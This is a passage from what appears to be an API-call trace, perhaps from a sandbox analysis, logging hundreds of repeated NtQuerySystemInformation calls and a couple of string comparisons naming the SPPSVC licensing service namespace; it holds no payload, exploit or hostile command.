Length=0x50, ResultLength=0x0) [0274.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0274.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0274.026] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x28, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0274.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdca0, Length=0x28, ResultLength=0x0) [0274.035] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x50, ResultLength=0x0) [0274.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda80, Length=0x28, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdaf0, Length=0x28, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb70, Length=0x28, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x20, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc50, Length=0x38, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x20, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x50, ResultLength=0x0) [0274.046] 